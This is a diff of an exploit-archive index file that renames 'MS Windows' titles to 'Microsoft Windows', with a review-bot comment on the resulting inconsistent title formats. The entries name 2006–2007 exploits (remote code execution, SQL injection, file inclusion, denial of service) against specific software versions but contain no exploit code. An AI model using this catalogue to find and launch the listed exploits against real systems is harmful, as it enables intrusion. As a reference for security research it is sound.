-1967,platforms/windows/dos/1967.c,"MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
+1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
+1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
 1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0
 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 (dbinstall.php) Remote File Include Vulnerability",2006-07-01,"Hamid Ebadi",php,webapps,0
@@ -1752,9 +1752,9 @@ id,file,description,date,author,platform,type,port
 2051,platforms/linux/dos/2051.py,"Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0
 2052,platforms/windows/remote/2052.sh,"MS Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110
-2054,platforms/windows/remote/2054.txt,"MS Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
+2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0
-2057,platforms/windows/dos/2057.c,"MS Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
+2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
 2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability",2006-07-22,"Virangar Security",php,webapps,0
 2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
 2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability",2006-07-23,magnific,php,webapps,0
@@ -1856,7 +1856,7 @@ id,file,description,date,author,platform,type,port
 2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0
 2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0
 2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0
-2162,platforms/windows/remote/2162.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445
+2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445
 2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability",2006-08-10,Morgan,php,webapps,0
 2164,platforms/windows/remote/2164.pm,"Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0
 2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 (page) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0
@@ -1888,7 +1888,7 @@ id,file,description,date,author,platform,type,port
 2191,platforms/php/webapps/2191.txt,"dotProject <= 2.0.4 (baseDir) Remote File Include Vulnerability",2006-08-16,Kacper,php,webapps,0
 2192,platforms/php/webapps/2192.txt,"OPT Max <= 1.2.0 (CRM_inc) Remote File Include Vulnerability",2006-08-16,Kacper,php,webapps,0
 2193,platforms/linux/local/2193.php,"PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit",2006-08-16,Andi,linux,local,0
-2194,platforms/windows/dos/2194.pl,"MS Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0
+2194,platforms/windows/dos/2194.pl,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0
 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0
 2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component Remote Include Vulnerability",2006-08-16,k1tk4t,php,webapps,0
 2198,platforms/php/webapps/2198.php,"CubeCart <= 3.0.11 (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0
@@ -1897,13 +1897,13 @@ id,file,description,date,author,platform,type,port
 2201,platforms/php/webapps/2201.txt,"POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability",2006-08-17,"Saudi Hackrz",php,webapps,0
 2202,platforms/php/webapps/2202.txt,"Mambo mambelfish Component <= 1.1 - Remote File Include Vulnerability",2006-08-17,mdx,php,webapps,0
 2203,platforms/php/webapps/2203.txt,"Joomla com_jim Component <= 1.0.1 - Remote File Include Vulnerability",2006-08-17,"Mehmet Ince",php,webapps,0
-2204,platforms/windows/dos/2204.c,"MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c)",2006-08-17,Preddy,windows,dos,0
+2204,platforms/windows/dos/2204.c,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC (c)",2006-08-17,Preddy,windows,dos,0
 2205,platforms/php/webapps/2205.txt,"Joomla Mosets Tree <= 1.0 - Remote File Include Vulnerability",2006-08-17,Crackers_Child,php,webapps,0
 2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability",2006-08-17,Cmaster4,php,webapps,0
 2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 File Include Vulnerability",2006-08-17,Cmaster4,php,webapps,0
 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0
 2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component <= 1.0b4 Remote Include Vulnerability",2006-08-18,camino,php,webapps,0
-2210,platforms/windows/dos/2210.c,"MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)",2006-08-18,vegas78,windows,dos,0
+2210,platforms/windows/dos/2210.c,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)",2006-08-18,vegas78,windows,dos,0
 2211,platforms/php/webapps/2211.txt,"PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability",2006-08-18,Kacper,php,webapps,0
 2212,platforms/php/webapps/2212.txt,"phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability",2006-08-18,Kacper,php,webapps,0
 2213,platforms/php/webapps/2213.txt,"Mambo MamboWiki Component <= 0.9.6 - Remote Include Vulnerability",2006-08-18,camino,php,webapps,0
@@ -1916,7 +1916,7 @@ id,file,description,date,author,platform,type,port
 2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability",2006-08-19,mdx,php,webapps,0
-2223,platforms/windows/remote/2223.c,"MS Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
+2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 - (adminlog) Remote File Incude Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component <= 1.1 File Include Vulnerability",2006-08-19,mdx,php,webapps,0
 2226,platforms/php/webapps/2226.txt,"NES Game and NES System <= c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0
@@ -1958,7 +1958,7 @@ id,file,description,date,author,platform,type,port
 2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0
 2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 (main.php) Remote File Include Vulnerability",2006-08-27,SHiKaA,php,webapps,0
 2264,platforms/windows/local/2264.htm,"VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0
-2265,platforms/windows/remote/2265.c,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
+2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval Vulnerability",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple Remote SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0
@@ -2048,7 +2048,7 @@ id,file,description,date,author,platform,type,port
 2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download Vulnerability",2006-09-12,Trex,php,webapps,0
 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability",2006-09-12,CeNGiZ-HaN,php,webapps,0
 2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0
-2355,platforms/windows/remote/2355.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
+2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability",2006-09-13,mdx,php,webapps,0
 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include Vulnerability",2006-09-13,Rivertam,php,webapps,0
 2358,platforms/windows/remote/2358.c,"MS Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0
@@ -2105,7 +2105,7 @@ id,file,description,date,author,platform,type,port
 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability",2006-09-21,DaDIsS,php,webapps,0
 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability",2006-09-21,Solpot,php,webapps,0
 2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0
-2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) - Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
+2412,platforms/windows/local/2412.c,"Microsoft Windows - (Windows Kernel) - Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
 2413,platforms/php/webapps/2413.txt,"SolidState <= 0.4 - Multiple Remote File Include Vulnerabilities",2006-09-21,Kacper,php,webapps,0
 2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 (include/xss/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0
 2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0
@@ -2361,7 +2361,7 @@ id,file,description,date,author,platform,type,port
 2669,platforms/php/webapps/2669.php,"Free Image Hosting <= 1.0 (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0
 2670,platforms/php/webapps/2670.php,"Free File Hosting <= 1.1 (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0
 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit",2006-10-28,FistFuXXer,windows,remote,8028
-2672,platforms/windows/dos/2672.py,"MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit",2006-10-28,h07,windows,dos,0
+2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit",2006-10-28,h07,windows,dos,0
 2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 (common.php) File Include Vulnerability",2006-10-29,"Mehmet Ince",php,webapps,0
 2674,platforms/php/webapps/2674.php,"MySource CMS <= 2.16.2 (init_mysource.php) Remote File Include Exploit",2006-10-29,Kacper,php,webapps,0
 2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 (index.php) Remote SQL Injection Exploit",2006-10-29,ajann,php,webapps,0
@@ -2371,7 +2371,7 @@ id,file,description,date,author,platform,type,port
 2679,platforms/php/webapps/2679.txt,"PHPMyRing <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability",2006-10-29,ajann,php,webapps,0
 2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (win32)",2006-10-29,"Michael Thumann",windows,remote,80
 2681,platforms/php/webapps/2681.txt,"QnECMS <= 2.5.6 (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0
-2682,platforms/windows/dos/2682.pl,"MS Windows NAT Helper Components Remote DoS Exploit (perl)",2006-10-30,x82,windows,dos,0
+2682,platforms/windows/dos/2682.pl,"Microsoft Windows NAT Helper Components Remote DoS Exploit (perl)",2006-10-30,x82,windows,dos,0
 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement (key) Remote SQL Injection Vulnerability",2006-10-30,ajann,asp,webapps,0
 2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 (key) Remote SQL Injection Vulnerability",2006-10-30,ajann,asp,webapps,0
 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a (includes/common.php) Remote Code Execution Exploit",2006-10-30,Kacper,php,webapps,0
@@ -2476,7 +2476,7 @@ id,file,description,date,author,platform,type,port
 2786,platforms/php/webapps/2786.txt,"torrentflux <= 2.2 (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0
 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0
 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0
-2789,platforms/windows/remote/2789.cpp,"MS Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0
+2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0
 2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0
 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure Vulnerability",2006-11-16,"Craig Heffner",php,webapps,0
 2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0
@@ -2485,10 +2485,10 @@ id,file,description,date,author,platform,type,port
 2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability",2006-11-17,bd0rk,php,webapps,0
-2800,platforms/windows/remote/2800.cpp,"MS Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0
+2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0
 2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Include Exploit",2006-11-17,Crackers_Child,php,webapps,0
 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability",2006-11-17,DeltahackingTEAM,php,webapps,0
-2809,platforms/windows/remote/2809.py,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (py)",2006-11-18,"Winny Thomas",windows,remote,445
+2809,platforms/windows/remote/2809.py,"Microsoft Windows NetpManageIPCConnect Stack Overflow Exploit (py)",2006-11-18,"Winny Thomas",windows,remote,445
 2810,platforms/php/webapps/2810.php,"Oxygen <= 1.1.3 (O2PHP Bulletin Board) Remote SQL Injection Exploit",2006-11-18,DarkFig,php,webapps,0
 2811,platforms/php/webapps/2811.txt,"phpWebThings <= 1.5.2 (editor.php) Remote File Include Vulnerability",2006-11-18,nuffsaid,php,webapps,0
 2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader <= 1.5 (save.php) Remote Code Execution Exploit",2006-11-18,nuffsaid,php,webapps,0
@@ -2553,7 +2553,7 @@ id,file,description,date,author,platform,type,port
 2876,platforms/php/webapps/2876.txt,"deV!Lz Clanportal [DZCP] <= 1.3.6 - Arbitrary File Upload Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection Vulnerability",2006-12-01,N/A,php,webapps,0
 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure Vulnerability",2006-12-01,qobaiashi,php,webapps,0
-2879,platforms/windows/dos/2879.py,"MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day)",2006-12-01,h07,windows,dos,0
+2879,platforms/windows/dos/2879.py,"Microsoft Windows spoolss GetPrinterData() Remote DoS Exploit (0day)",2006-12-01,h07,windows,dos,0
 2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0
 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities",2006-12-01,ajann,asp,webapps,0
 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional (Path Disclosure/Include) Multiple Vulns",2006-12-02,y3dips,php,webapps,0
@@ -2574,7 +2574,7 @@ id,file,description,date,author,platform,type,port
 2897,platforms/php/webapps/2897.txt,"CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability",2006-12-08,"Paul Bakoyiannis",php,webapps,0
 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
-2900,platforms/windows/dos/2900.py,"MS Windows DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
+2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
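Review bot: The renamed title for 2900 gains a ` - ` right after `Microsoft Windows`, while the renames for 2682, 2879 and 3013 in the neighbouring hunks leave product and component in one run, so the same commit produces two title shapes. Anyone matching index titles by product prefix, for example to map an advisory such as MS06-041 to its entries, now has to handle both. Picking one form throughout would avoid that, e.g. `"Microsoft Windows - NAT Helper Components Remote DoS Exploit (perl)"` for 2682. The same mixed pattern shows up at 3022 versus 3024 and at 3634 versus 3635.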
@@ -2639,7 +2639,7 @@ id,file,description,date,author,platform,type,port
 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Include Vulnerabilities",2006-12-20,mdx,php,webapps,0
 2965,platforms/php/webapps/2965.txt,"TextSend <= 1.5 (config/sender.php) Remote File Include Vulnerability",2006-12-20,nuffsaid,php,webapps,0
 2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 (ActiveX Control) Denial of Service Exploit",2006-12-20,shinnai,windows,dos,0
-2967,platforms/windows/dos/2967.cs,"MS Windows (MessageBox) Memory Corruption Local Denial of Service",2006-12-20,N/A,windows,dos,0
+2967,platforms/windows/dos/2967.cs,"Microsoft Windows - (MessageBox) Memory Corruption Local Denial of Service",2006-12-20,N/A,windows,dos,0
 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit",2006-12-20,Kacper,php,webapps,0
 2969,platforms/php/webapps/2969.txt,"Php/Mysql Site Builder 0.0.2 (htm2php.php) File Disclosure Vulnerability",2006-12-21,"the master",php,webapps,0
 2970,platforms/php/webapps/2970.txt,"Newxooper-php 0.9.1 (mapage.php) Remote File Include Vulnerability",2006-12-21,3l3ctric-Cracker,php,webapps,0
@@ -2685,7 +2685,7 @@ id,file,description,date,author,platform,type,port
 3010,platforms/php/webapps/3010.txt,"myphpNuke Module My_eGallery 2.5.6 (basepath) RFI Vulnerability",2006-12-25,"Mehmet Ince",php,webapps,0
 3011,platforms/php/webapps/3011.pl,"Fishyshoop <= 0.930b Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0
 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability",2006-12-25,ShaFuck31,php,webapps,0
-3013,platforms/windows/dos/3013.py,"MS Windows NetrWkstaUserEnum() Remote DoS Exploit (0day)",2006-12-25,h07,windows,dos,0
+3013,platforms/windows/dos/3013.py,"Microsoft Windows NetrWkstaUserEnum() Remote DoS Exploit (0day)",2006-12-25,h07,windows,dos,0
 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Remote Upload File / Code Execution Vuln",2006-12-25,CorryL,php,webapps,0
 3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 (main) Remote SQL Injection Exploit",2006-12-26,ajann,asp,webapps,0
 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0
@@ -2694,9 +2694,9 @@ id,file,description,date,author,platform,type,port
 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities",2006-12-26,Cr@zy_King,php,webapps,0
 3020,platforms/php/webapps/3020.pl,"PHP-Update <= 2.7 (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0
 3021,platforms/linux/remote/3021.txt,"ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21
-3022,platforms/windows/remote/3022.txt,"MS Windows ASN.1 - Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445
+3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 - Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445
 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 (PRIVMSG) Remote Buffer Overflow PoC",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0
-3024,platforms/windows/local/3024.c,"MS Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0
+3024,platforms/windows/local/3024.c,"Microsoft Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0
 3025,platforms/php/webapps/3025.pl,"Yrch 1.0 (plug.inc.php path variable) Remote File Include Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0
 3026,platforms/php/webapps/3026.txt,"Bubla <= 1.0.0rc2 (bu/process.php) Remote File Include Vulnerability",2006-12-27,DeltahackingTEAM,php,webapps,0
 3027,platforms/php/webapps/3027.txt,"Fantastic News <= 2.1.4 - Multiple Remote File Include Vulnerabilities",2006-12-27,Mr-m07,php,webapps,0
@@ -2723,7 +2723,7 @@ id,file,description,date,author,platform,type,port
 3049,platforms/php/webapps/3049.php,"IMGallery <= 2.5 Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0
 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge (boarddir) Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0
 3051,platforms/php/webapps/3051.txt,"Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability",2006-12-30,"Mehmet Ince",php,webapps,0
-3052,platforms/windows/dos/3052.c,"MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0
+3052,platforms/windows/dos/3052.c,"Microsoft Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free",2006-12-31,"Ruben Santamarta ",windows,dos,0
 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0
 3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 (user.dat) Remote Password Disclosure Vulnerablity",2006-12-31,3l3ctric-Cracker,php,webapps,0
 3055,platforms/windows/remote/3055.html,"WinZIP 10.0 FileView ActiveX Controls Remote Overflow Exploit",2006-12-31,XiaoHui,windows,remote,0
@@ -2782,7 +2782,7 @@ id,file,description,date,author,platform,type,port
 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Include Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0
 3109,platforms/php/webapps/3109.php,"Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit",2007-01-10,rgod,php,webapps,0
 3110,platforms/osx/dos/3110.rb,"Mac OS X 10.4.8 Apple Finder DMG Volume Name Memory Corruption PoC",2007-01-09,MoAB,osx,dos,0
-3111,platforms/windows/dos/3111.pl,"MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit",2007-01-13,cyanid-E,windows,dos,0
+3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (WMF) CreateBrushIndirect DoS Exploit",2007-01-13,cyanid-E,windows,dos,0
 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0
 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability",2007-01-10,irvian,php,webapps,0
 3114,platforms/php/webapps/3114.txt,"Article System 0.1 (INCLUDE_DIR) Remote File Include Vulnerabilities",2007-01-11,3l3ctric-Cracker,php,webapps,0
@@ -2858,7 +2858,7 @@ id,file,description,date,author,platform,type,port
 3186,platforms/asp/webapps/3186.txt,"ASP EDGE <= 1.2b (user.asp) Remote SQL Injection Vulnerability",2007-01-24,ajann,asp,webapps,0
 3187,platforms/asp/webapps/3187.txt,"ASP NEWS <= 3.0 - (news_detail.asp) Remote SQL Injection Vulnerability",2007-01-24,ajann,asp,webapps,0
 3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0
-3190,platforms/windows/dos/3190.py,"MS Windows Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0
+3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0
 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 (MODULES_DIR) Remote File Inclusion Vulnerability",2007-01-24,3l3ctric-Cracker,php,webapps,0
 3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Include Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0
